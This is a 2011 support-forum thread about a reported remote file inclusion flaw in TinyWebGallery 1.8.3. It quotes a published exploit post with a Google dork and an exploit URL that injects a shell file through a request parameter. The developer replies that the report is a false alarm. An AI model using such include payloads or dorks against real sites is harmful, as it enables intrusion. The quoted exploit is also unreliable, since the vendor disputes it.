Php photo gallery TWG | JFUploader | TWG Flash upload | WFU | Forum
https://www.tinywebgallery.com/forum/

TinyWebGallery v 1.8.3 Remote file include vulnerbility
https://www.tinywebgallery.com/forum/viewtopic.php?f=5&t=2892
Page 1 of 1

Author:  kmcjr3 [ 4. Feb 2011, 05:58 ]
Post subject:  TinyWebGallery v 1.8.3 Remote file include vulnerbility

I began having trouble with an installation of TWG183 -If I tried to make any configuration changes in the admin area, the gallery would stop working with public messages that that no albums existed. In fact, all graphics associated with twg were no longer available as if the installation path was incorrect. In the admin area everything is looks fine.
The other thing that was happening was that a pop-under ad would be displayed when this occured.

I figured I had be hacked somehow so, I deleted the installation and uploaded a new one. After entering the admin area I looked at the installation check info and found that session.save_path is suddenly "Not available" on my shared server (IXWebhosting). Now curious as to why this might be, I performed a search and found the following exploit post -

http://securityreason.com/expldownload/1/9885/1 (full post is below)

Now, I have known IXWebhosting to block exploited scripts without saying anything and perhaps that is what has happened here. They disabled session.save_path in the php.ini because of the exploit. I still have not heard back yet.

So is this a problem that needs to be fixed with TWG 183? If so, is there an update already?

Thank you
Ken



START CONTENTS OF POST
# Exploit Title: TinyWebGallery v 1.8.3 Remote file include vulnerbility
# Google Dork: Photo Gallery powered by TinyWebGallery 1.8.3
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.tinywebgallery.com
# Version: v 1.8.3
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################
Fichier : i_basic.inc.php
http://localhost/[path]/i_frames/i_basic.inc.php

Code :
<?php
include '../config.php';

$basedir_save = $basedir;
?>

Exploit :
http://127.0.0.1/[path]/i_frames/i_basic.inc.php?basedir_save= [ Shell.txt ]

Enjoy :)

##########################################################
#
Greetz To : #
RoMaNcYxHaCkEr - saudi0hacker - aB0-3tH4b T3rR0r - TakEr #
#
##########################################################
END CONTENTS OF POST

Author:  TinyWebGallery [ 4. Feb 2011, 10:17 ]
Post subject:  Re: TinyWebGallery v 1.8.3 Remote file include vulnerbility

This a false alarm
http://www.tinywebgallery.com/demo/i_fr ... ic.inc.php
cannot be called directly as you can see

and
<?php
include '../config.php';

$basedir_save = $basedir;
?>

is not the code which is in this file!!!

it starts with

<?php
defined( '_VALID_TWG' ) or die( 'Direct Access to this location is not allowed.' );

and therefore cannot be used directly.

I have already contacted the website to remove this false alarm.

there is another exploit (http://securityreason.com/exploitalert/9911) which is already fixed in 1.8.4.
But this was only possible if you are logged in!! This exploit does NOT work without a logged in user!

Have you checked your log file about the attack? If not you actually don't know what was the problem.

Best,
Michael

Author:  kmcjr3 [ 4. Feb 2011, 16:04 ]
Post subject:  Re: TinyWebGallery v 1.8.3 Remote file include vulnerbility

Thanks - I will check further

Author:  kmcjr3 [ 4. Feb 2011, 17:45 ]
Post subject:  Re: TinyWebGallery v 1.8.3 Remote file include vulnerbility

What are the consequences to the photo gallery if session.save_path is not available?

Author:  TinyWebGallery [ 4. Feb 2011, 18:00 ]
Post subject:  Re: TinyWebGallery v 1.8.3 Remote file include vulnerbility

You are not able to login and the caching does not work.

- Michael

Page 1 of 1 All times are UTC + 1 hour [ DST ]
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/